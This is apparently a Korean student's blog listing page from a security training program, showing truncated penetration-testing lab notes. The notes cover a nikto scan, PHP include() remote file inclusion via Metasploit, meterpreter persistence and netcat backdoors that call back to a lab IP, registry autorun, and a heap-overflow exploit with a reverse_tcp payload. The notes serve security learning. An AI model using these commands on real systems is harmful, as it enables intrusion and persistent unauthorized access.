외부 교육 정리 (29) 썸네일형 리스트형 [과제] 로그인 리퀘스트 패킷 캡쳐 보호되어 있는 글입니다. 1일차 (멘토님하고 처음 만남) 보호되어 있는 글입니다. 14.9 ~ 15.1 모두 수고하셨습니다. 영재원을 처음 갔을 때 인성교육부터라온에서 실시한 방학 집중 교육 까지입학할 때는 그저 설레기만 했는데 지금은 수료하고 나니 뿌듯합니다. 서울여대 정보보호 영재교육원 1기 고등 전문 1반 모두 수고하셨습니다 :) 메타스플로잇 익스플로잇 추가 방법(raon00) 보호되어 있는 글입니다. [모의해킹] 리눅스 웹서버 취약점 탐색 - nikto /pentest/web/nikto/nikto.pl -h [서버주소] -p [포트]Ex) /pentest/web/nikto.pl -h 192.168.7.136 -p 80 php include 취약점php의 include() 함수는 지정경로의 파일을 포함한다.만약 php소스가 include("/etc/passwd") 일 경우, /etc/passwd 의 내용을 참조한다또한 이것은 꼭 파일의 경로에 한정된 것이 아닌, URL도 포함된다.따라서 내 포트중 하나에 악의적인 PHP소스를 넣고 열어두어 희생자 PC에 내 소스를 참조하게 한다면,공격은 성공한다. use exploit/unix/webapp/php_includeset PHPURL [URL]/?hacker=www.naver.com--> naver.com 을 .. [모의해킹] 자동 백도어 설치 File format attak- PDF- SWF- HWP- AVI 요즘은 거의 HWP 를 주로 공격하는데, 그 이유는 관공서에서는 무조건 HWP 를 사용하기 때문이다. 자동백도어 설치 meterpreter> run persistence -h-X : 시작시 자동실행-i : 응답시간-p : 포트번호-r : 응답 받을 아이피. (백트랙의 아이피)-L : 설치할 경로 meterpreter> run persistence -X -L c:\\ -i 10 -p 443 -r 192.168.7.131--> 시스템 시작시 자동 실행, 포트 443, 192.168.7.131로 접속, 응답 시간 10초, c:\\에 설치. 그리고 백트랙에서는 핸들러를 열어야 한다. msf> use multi/handlermsf exploit(.. [모의해킹] 타겟PC 에 Backdoor 설치 우선 기존의 exploit 을 통해 meterpreter 쉘로 진입한다.(일단 예시를 위해 ms08_067 로 익스플로잇) 그 후, upload 명령어를 이용해 nc.exe 를 업로드 시킨다. (백도어)업로드 명령어upload [Upload_File_Path] [To_upload_File_path] 백도어를 설치하는 이유는 장악 유지를 하기 위해, 언제든지 내가 침입하기 위해 설치하는 것 백도어를 설치할 때는, 우선 항상 실행되게 하기 위해 레지스트리에 등록을 해놓고, 시작프로그램으로 실행되게 한다. meterpreter> reg// 레지스트리 명령어 시작 프로그램 등록을 위해 우리가 변경해야 할 레지스트리의 키 경로는,HKEY_LOCAL_MACHINE - SOFTWARE - Microsoft - Win.. 모의해킹 - Heap Overflow 를 이용한 Exploit [+] Stack 을 이용한 오버플로우는 익스플로잇 확률이 거의 100%에 가까워서 실습이 쉬웠지만,Heap 영역은 런타임 시에 결정되므로 성공률이 높지 않다.(익스플로잇이 될수도, 실패할 수도 있다) Exploit name - ms04_007_killbillPayload name - reverse_tcp 나중에 성공하면 다시 올리겠다. 이전 1 2 3 4 다음